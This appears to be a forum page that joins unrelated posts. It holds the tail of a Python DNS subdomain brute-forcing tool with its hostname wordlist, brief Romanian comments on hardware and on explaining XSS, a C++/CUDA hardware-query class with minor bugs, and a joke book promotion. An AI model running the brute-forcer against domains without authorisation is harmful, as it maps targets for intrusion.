'mdaemon', 'me', 'media', 'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger', 'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike', 'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi', 'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor', 'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3', 'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange', 'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia', 'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1', 'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville', 'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp', 'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen', 'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey', 'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups', 'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj', 'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora', 'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias', 'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1', 'ns2', 'ns3', 'ns4', 'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver', 'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office', 'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha', 'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview', 'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or', 'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar', 'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01', 'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages', 'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch', 'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101', 'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2', 'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft', 'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix', 'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures', 'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum', 'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop', 'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales', 'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15', 'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4', 'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press', 'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private', 'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo', 'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs', 'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen', 'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius', 'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver', 'recruiting', 'red', 'redhat', 'ref', 'reference', 'reg', 'register', 'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats', 'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho', 'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose', 'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1', 'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento', 'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego', 'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc', 'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle', 'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri', 'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services', 'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint', 'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si', 'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius', 'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc', 'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort', 'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source', 'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota', 'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk', 'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01', 'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv', 'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1', 'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock', 'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail', 'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1', 'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw', 'sw0', 'sw01', 'sw1', 'sweden', 'switch', 'switzerland', 'sy', 'sybase', 'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't', 'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team', 'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp', 'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k', 'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite', 'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta', 'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn', 'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour', 'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity', 'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u', 'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom', 'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads', 'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users', 'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault', 'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi', 'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual', 'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip', 'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz', 'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse', 'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard', 'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp', 'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring', 'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites', 'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends', 'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi', 'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2', 'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02', 'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate', 'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless', 'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad', 'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4', 'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-', 'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02', 'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x', 'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow', 'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm', 'zulu', 'zw' ] def usage(): print('\n' + USAGE) sys.exit() return def check_usage(): if len(sys.argv) == 1: print('[!] WARNING: use -H for help and usage') sys.exit() return def get_default_nameserver(): print('[+] getting default nameserver') lines = list(open('/etc/resolv.conf', 'r')) for line in lines: line = string.strip(line) if not line or line[0] == ';' or line[0] == '#': continue fields = string.split(line) if len(fields) < 2: continue if fields[0] == 'nameserver': defaults['nameserver'] = fields[1] return defaults def get_default_source_ip(): print('[+] getting default ip address') try: # get current used iface enstablishing temp socket ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ipsocket.connect(("gmail.com", 80)) defaults['ipaddr'] = ipsocket.getsockname()[0] print('[+] found currently used interface ip ' + "'" + defaults['ipaddr'] + "'") ipsocket.close() except: print(''' [!] WARNING: can\'t get your ip-address, use "-i" option and define yourself''') return defaults def parse_cmdline(): p = argparse.ArgumentParser(usage=USAGE, add_help=False) p.add_argument( '-t', metavar='<type>', dest='type', help='attack type (0 for dictionary 1 for bruteforce)' ) p.add_argument( '-a', metavar='<domain>', dest='domain', help='subdomain to bruteforce' ) p.add_argument( '-l', metavar='<wordlist>', dest='wordlist', help='wordlist, one hostname per line (default: predefined in code)' ) p.add_argument( '-d', metavar='<nameserver>', dest='dnshost', help="choose another nameserver (default: your system's)" ) p.add_argument( '-i', metavar='<ipaddr>', dest='ipaddr', help="source ip address to use (default: your system's)" ) p.add_argument( '-p', metavar='<port>', dest='port', default=0, help='source port to use (default: 0 --> first free random port)' ) p.add_argument( '-u', metavar='<protocol>', dest='protocol', default='udp', help='speak via udp or tcp (default: udp)' ) p.add_argument( '-c', metavar='<charset>', dest='charset', default=0, help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)' ) p.add_argument( '-m', metavar='<maxchar>', dest='max', default=2, help='max chars to bruteforce (default: 2)' ) p.add_argument( '-s', metavar='<prefix>', dest='prefix', help="prefix for bruteforce, e.g. 'www'" ) p.add_argument( '-g', metavar='<postfix>', dest='postfix', help="postfix for bruteforce, e.g. 'www'" ) p.add_argument( '-o', metavar='<sec>', dest='timeout', default=3, help='timeout (default: 3)' ) p.add_argument( '-v', action='store_true', dest='verbose', help='verbose mode - prints every attempt (default: quiet)' ) p.add_argument( '-w', metavar='<sec>', dest='wait', default=0, help='seconds to wait for next request (default: 0)' ) p.add_argument( '-x', metavar='<num>', dest='threads', default=32, help='number of threads to use (default: 32) - choose more ' ) p.add_argument( '-r', metavar='<logfile>', dest='logfile', default='stdout', help='write found subdomains to file (default: stdout)' ) p.add_argument( '-V', action='version', version='%(prog)s ' + VERSION, help='print version information' ) p.add_argument( '-H', action='help', help='print this help' ) return(p.parse_args()) def check_cmdline(opts): if not opts.type or not opts.domain: print('[-] ERROR: mount /dev/brain') sys.exit() return def set_opts(defaults, opts): if not opts.dnshost: opts.dnshost = defaults['nameserver'] if not opts.ipaddr: opts.ipaddr = defaults['ipaddr'] if int(opts.charset) == 0: opts.charset = chars + digits elif int(opts.charset) == 1: opts.charset = chars else: opts.charset = digits if not opts.prefix: opts.prefix = prefix if not opts.postfix: opts.postfix = postfix return opts def read_hostnames(opts): print('[+] reading hostnames') hostnames = [] if opts.wordlist: hostnames = list(open(opts.wordlist, 'r')) return hostnames else: return wordlist def attack(opts, hostname, attack_pool): if opts.verbose: sys.stdout.write(' -> trying %s\n' % hostname) sys.stdout.flush() try: x = dns.message.make_query(hostname, 1) if opts.protocol == 'udp': a = dns.query.udp(x, opts.dnshost, float(opts.timeout), 53, None, opts.ipaddr, int(opts.port), True, False) else: a = dns.query.tcp(x, opts.dnshost, float(opts.timeout), 53, None, opts.ipaddr, int(opts.port), False) attack_pool.release() except dns.exception.Timeout: print('[-] ERROR: time out!') sys.exit() except socket.error: print('''[-] ERROR: no connection? ip|srcport incorrectly defined? you can run only one thread if fixed source port specified!''') sys.exit() if a.answer: answ = '' # iterate dns rrset answer (can be multiple sets) field to extract # detailed info (dns and ip) for i in a.answer: answ += str(i[0]) answ += ' ' answer = (hostname, answ) found.append(answer) else: pass return def str_gen(opts, hostnames): print('[+] generating list of strings') tmp_hostnames = itertools.product(opts.charset, repeat=int(opts.max)) hostnames = list(tmp_hostnames) hostnames = map(''.join, hostnames) return hostnames def run_threads(opts, hostname, attack_pool, threads): t = threading.Thread(target=attack, args=(opts, hostname, attack_pool)) attack_pool.acquire() t.start() threads.append(t) return threads def prepare_attack(opts, hostnames): sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain) threads = list() attack_pool = threading.BoundedSemaphore(value=int(opts.threads)) if opts.type == '0': sys.stdout.write('dictionary\n') for hostname in hostnames: hostname = hostname.rstrip() + '.' + opts.domain time.sleep(float(opts.wait)) threads = run_threads(opts, hostname, attack_pool, threads) for t in threads: t.join() elif opts.type == '1': sys.stdout.write('bruteforce\n') hostnames = str_gen(opts, hostnames) for hostname in hostnames: hostname = opts.prefix + hostname + opts.postfix + '.' + opts.domain time.sleep(float(opts.wait)) threads = run_threads(opts, hostname, attack_pool, threads) for t in threads: t.join() else: print('[-] ERROR: unknown attack type') sys.exit() return def ip_extractor(ip): #extract ip from string of rrset answer object try: extracted = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip) return extracted[0] except: print('[-] ERROR: can\'t extract ip addresses') sys.exit() def analyze_results(opts, found): #get maindomain ip try: mainhostip = socket.gethostbyname(opts.domain) #append domain|ip to diffound if subdomain ip different than starting # domain ip ([diffound.append(domain + ' | ' + ip) for domain, ip in found if ip_extractor(ip) != mainhostip]) except dns.exception.Timeout: sys.exit() except socket.error: print('[-] ERROR: wrong domain or no connection?') sys.exit() return def log_results(opts, found, diffound): if opts.logfile == 'stdout': print('---') if not found: print('no hosts found ') else: print('ANSWERED DNS REQUESTS') print('---') for f in found: print(f[0]+' | '+f[1]) if not diffound: print('---') print('NO HOSTS WITH DIFFERENT IP FOUND ') else: print('---') print('ANSWERED DNS REQUEST WITH DIFFERENT IP') print('---') for domain in diffound: print(domain) else: print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile) with open(opts.logfile, 'w') as f: if found: f.write('---\n') f.write('ANSWERED DNS REQUESTS\n') f.write('---\n') for x in found: f.write('domain: '+x[0]+' | '+x[1]+ '\n') if not diffound: f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND \n') else: f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n') for domain in diffound: f.write(domain + '\n') f.close() print('[+] game over') return def main(): check_usage() opts = parse_cmdline() check_cmdline(opts) if not opts.dnshost: defaults = get_default_nameserver() if not opts.ipaddr: defaults = get_default_source_ip() if opts.protocol != 'udp' and opts.protocol != 'tcp': print('[-] ERROR: unknown protocol') sys.exit(1337) opts = set_opts(defaults, opts) hostnames = read_hostnames(opts) prepare_attack(opts, hostnames) analyze_results(opts, found) log_results(opts, found, diffound) return if __name__ == '__main__': try: print(BANNER + '\n') main() except KeyboardInterrupt: print('\n[!] WARNING: aborted by user') raise SystemExit # EOF Source

Sunt sigur ca sunt mai multe persoane interesate(printre care si eu). Legat de begood, SpaceX adica compania care se ocupa cu dezvoltarea si creerea de rachete si nave spatiale? Legat de sistemul acesta, sunt multe chestii ce ar putea fi facute. Ar fi interesant un proiect marca rst pe platforma asta, dar nu imi vine in cap nici o idee(in afara de hashcracking, sau lucruri conexe)

Nu cred ca da randament prea bun la minat. @begood e pasionat de chestiile astea, poate il convingem sa revina pe forum si sa ne zica daca s-a jucat cu parallella. Aveti vreun proiect in minte? Eu ma gandeam sa reproduc un magic mirror, dar nu prea ma incanta raspberry pi.

Stiu ce inseamna POC. Ideea e ca oamenii nu au habar ce inseamna un xss. Le spui locatia, parametrul vulnerabil, le schitezi si un mic scenariu de atac si ei intreaba de ce am folosit document.cookie. LE explic si apoi ma intreaba la ce date am acces...

Am vazut zilele trecute o intrebare care se referea la cum se poate obtine numarul de core-uri CPU. Fragmentul de mai jos returneaza numarul de nuclee si specificatiile placii grafice(in cazul in care aceasta face parte din familia Nvidia Geforce): system_specs.h: #ifndef SYSTEM_SPECS_H #define SYSTEM_SPECS_H #include "includes.h" class SystemSpecs{ public: SystemSpecs(bool showInfo); ~SystemSpecs(void){}; int getNumberOfCPUCores(void); int getProcessorType(void); int getNumberOfGPUs(void); size_t getTotalConstantMemory(int deviceID); size_t getTotalGlobalMemory(int deviceID); size_t getSharedMemPerBlock(int deviceID); int getWarpSize(int deviceID); int getMaxNumberOfBlocks_x(int deviceID); int getMaxNumberOfBlocks_y(int deviceID); int getMaxNumberOfBlocks_z(int deviceID); int getMaxThreadsPerBlock(int deviceID); int getMaxThreads_x(int deviceID); int getMaxThreads_y(int deviceID); int getMaxThreads_z(int deviceID); void printGPUSpecs(void); private: #ifdef WIN32 /// query system info on windows SYSTEM_INFO system_info; #else /// query system info on linux #endif int device_count; int dev; int runtime_version, driver_version; cudaDeviceProp *device_prop; char msg[256]; char cTemp[10]; std::string sprofile_string; }; #endif sytem_specs.cpp: #include "system_specs.h" SystemSpecs::SystemSpecs(bool showInfo) { #ifdef WIN32 /// query sysinfo on windows GetSystemInfo(&system_info); #else /// query sysinfo on linux #endif if(showInfo) { device_count = 0; dev = 0; driver_version = 0; runtime_version = 0; sprofile_string = "deviceQuery, CUDA Driver = CUDART"; if (cudaGetDeviceCount(&device_count) != cudaSuccess) { cout << "cudaGetDeviceCount FAILED CUDA Driver and Runtime version may be mismatched.\n"<<endl; } if (device_count == 0){ cout<<"There is no device supporting CUDA"<<endl; } if(device_count == 0) { device_prop = new cudaDeviceProp[device_count + 1]; } else { device_prop = new cudaDeviceProp[device_count]; } for (dev = 0; dev < device_count; ++dev) { cudaGetDeviceProperties(&device_prop[dev], dev); if (dev == 0) { // This function call returns 9999 for both major & minor fields, if no CUDA capable devices are present if (device_prop[0].major == 9999 && device_prop[0].minor == 9999) cout<<"There is no device supporting CUDA."<<endl; else if (device_count == 1) cout<<"There is 1 device supporting CUDA."<<endl; else cout<<"There are "<<device_count<<"%d devices supporting CUDA"<<endl; } } } } int SystemSpecs::getNumberOfCPUCores(void) { #ifdef WIN32 /// windows return system_info.dwNumberOfProcessors; #else /// linux return sysconf(_SC_NPROCESSORS_ONLN); #endif } int SystemSpecs::getProcessorType(void) { #ifdef WIN32 /// windows return system_info.dwProcessorType; #else /// linux return 0; #endif } void SystemSpecs::printGPUSpecs(void) { cout<<" CUDA Device Query (Runtime API) version (CUDART static linking)\n\n"<<endl; for (dev = 0; dev < device_count; ++dev) { if (dev == 0) { // This function call returns 9999 for both major & minor fields, if no CUDA capable devices are present if (device_prop[0].major == 9999 && device_prop[0].minor == 9999) cout<<"There is no device supporting CUDA."<<endl; else if (device_count == 1) cout<<"There is 1 device supporting CUDA."<<endl; else cout<<"There are "<<device_count<<"%d devices supporting CUDA"<<endl; } cout<<"\n Device "<<dev<<":"<<device_prop->name<<endl; #if CUDART_VERSION >= 2020 // Console log cudaDriverGetVersion(&driver_version); cout<<" CUDA Driver Version: "<<driver_version / 1000<<"."<<driver_version % 100<<endl; cudaRuntimeGetVersion(&runtime_version); cout<<" CUDA Runtime Version: "<<runtime_version / 1000<<"."<<runtime_version % 100<<endl; #endif cout<<" CUDA Capability Major/Minor version number: "<<device_prop[dev].major<<"."<<device_prop[dev].minor<<endl; sprintf(msg, " Total amount of global memory: %llu bytes\n", (unsigned long long) device_prop[dev].totalGlobalMem); #if CUDART_VERSION >= 2000 /*printf(" Multiprocessors x Cores/MP = Cores: %d (MP) x %d (Cores/MP) = %d (Cores)\n", device_prop->multiProcessorCount, ConvertSMVer2Cores(device_prop[dev].major, device_prop[dev].minor), ConvertSMVer2Cores(device_prop[dev].major, device_prop[dev].minor) * device_prop[dev].multiProcessorCount); */ #endif cout<<" Total amount of constant memory: "<<device_prop[dev].totalConstMem<<" bytes."<<endl; cout<<" Total amount of shared memory per block: "<<device_prop[dev].sharedMemPerBlock<<" bytes."<<endl; cout<<" Total number of registers available per block: "<<device_prop[dev].regsPerBlock<<endl; cout<<" Warp size: "<<device_prop[dev].warpSize<<endl; cout<<" Maximum number of threads per block: "<<device_prop[dev].maxThreadsPerBlock<<endl; printf(" Maximum sizes of each dimension of a block: %d x %d x %d\n", device_prop[dev].maxThreadsDim[0], device_prop[dev].maxThreadsDim[1], device_prop[dev].maxThreadsDim[2]); printf(" Maximum sizes of each dimension of a grid: %d x %d x %d\n", device_prop[dev].maxGridSize[0], device_prop[dev].maxGridSize[1], device_prop[dev].maxGridSize[2]); cout<<" Maximum memory pitch: "<<device_prop[dev].memPitch<<" bytes"<<endl; cout<<" Texture alignment: "<<device_prop[dev].textureAlignment<<" bytes"<<endl; cout<<" Clock rate: "<<device_prop[dev].clockRate * 1e-6f<<"GHz"<<endl; #if CUDART_VERSION >= 2000 printf(" Concurrent copy and execution: %s\n", device_prop[dev].deviceOverlap ? "Yes" : "No"); #endif #if CUDART_VERSION >= 2020 printf(" Run time limit on kernels: %s\n", device_prop[dev].kernelExecTimeoutEnabled ? "Yes" : "No"); printf(" Integrated: %s\n", device_prop[dev].integrated ? "Yes" : "No"); printf(" Support host page-locked memory mapping: %s\n", device_prop[dev].canMapHostMemory ? "Yes" : "No"); printf(" Compute mode: %s\n", device_prop[dev].computeMode == cudaComputeModeDefault ? "Default (multiple host threads can use this device simultaneously)" : device_prop[dev].computeMode == cudaComputeModeExclusive ? "Exclusive (only one host thread at a time can use this device)" : device_prop[dev].computeMode == cudaComputeModeProhibited ? "Prohibited (no host thread can use this device)" : "Unknown"); #endif #if CUDART_VERSION >= 3000 printf(" Concurrent kernel execution: %s\n", device_prop[dev].concurrentKernels ? "Yes" : "No"); #endif #if CUDART_VERSION >= 3010 printf(" Device has ECC support enabled: %s\n", device_prop[dev].ECCEnabled ? "Yes" : "No"); #endif #if CUDART_VERSION >= 3020 printf(" Device is using TCC driver mode: %s\n", device_prop[dev].tccDriver ? "Yes" : "No"); #endif } cout<<endl; // driver version sprofile_string += ", CUDA Driver Version = "; #ifdef WIN32 sprintf_s(cTemp, 10, "%d.%d", driver_version / 1000, driver_version % 100); #else sprintf(cTemp, "%d.%d", driver_version / 1000, driver_version % 100); #endif sprofile_string += cTemp; // Runtime version sprofile_string += ", CUDA Runtime Version = "; #ifdef WIN32 sprintf_s(cTemp, 10, "%d.%d", runtime_version / 1000, runtime_version % 100); #else sprintf(cTemp, "%d.%d", runtime_version / 1000, runtime_version % 100); #endif sprofile_string += cTemp; // Device count sprofile_string += ", NumDevs = "; #ifdef WIN32 sprintf_s(cTemp, 10, "%d", device_count); #else sprintf(cTemp, "%d", device_count); #endif sprofile_string += cTemp; // First 2 device names, if any for (dev = 0; dev < ((device_count > 2) ? 2 : device_count); ++dev) { cudaGetDeviceProperties(&device_prop[dev], dev); sprofile_string += ", Device = "; sprofile_string += device_prop[dev].name; } sprofile_string += "\n"; // finish cout<<"\n\nPASSED\n"; } size_t SystemSpecs::getTotalConstantMemory(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].totalConstMem; } } size_t SystemSpecs::getSharedMemPerBlock(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].sharedMemPerBlock; } } size_t SystemSpecs::getTotalGlobalMemory(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].totalGlobalMem; } } int SystemSpecs::getWarpSize(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].warpSize; } } int SystemSpecs::getMaxThreadsPerBlock(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxThreadsPerBlock; } } int SystemSpecs::getMaxThreads_x(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxThreadsDim[0]; } } int SystemSpecs::getMaxThreads_y(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxThreadsDim[1]; } } int SystemSpecs::getMaxThreads_z(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxThreadsDim[2]; } } int SystemSpecs::getMaxNumberOfBlocks_x(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxGridSize[0]; } } int SystemSpecs::getMaxNumberOfBlocks_y(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxGridSize[1]; } } int SystemSpecs::getMaxNumberOfBlocks_z(int deviceID) { if(deviceID > dev - 1 || deviceID < 0) { cout<<"Invalid device specified"<<endl; return 0; } else { return SystemSpecs::device_prop[deviceID].maxGridSize[2]; } } int SystemSpecs::getNumberOfGPUs(void) { return SystemSpecs::dev; }

Daca va uitati la serialul Cosmos de pe National Geographic atunci stiti cine este Carl Sagan, cartea este grozava, nu are legatura cu tema forumului dar e una din cartile care te formeaza pentru a gandi "out of the box", un lucru absolut necesar in IT si subdomeniile aferente, pur si simplu iti dezvolta creativitatea. FAQ: 1.Cat costa ? Doar 2 pachete de tigari si o ciunga. 2.Merita sa cumpar cartea ? DAAAA 3.De ce as cumpara-o ? Mai inveti cate ceva, te dai bine pe langa baietii din staff, e cartea preferata a lu Neme, o citeste in fiecare noapte inainte de culcare. In plus, cand stai cu baietii la o bere, mai spargi o samanta, mai spui o chestie cool, pari destept, iti faci gagica. Atat. Cumpara Cosmos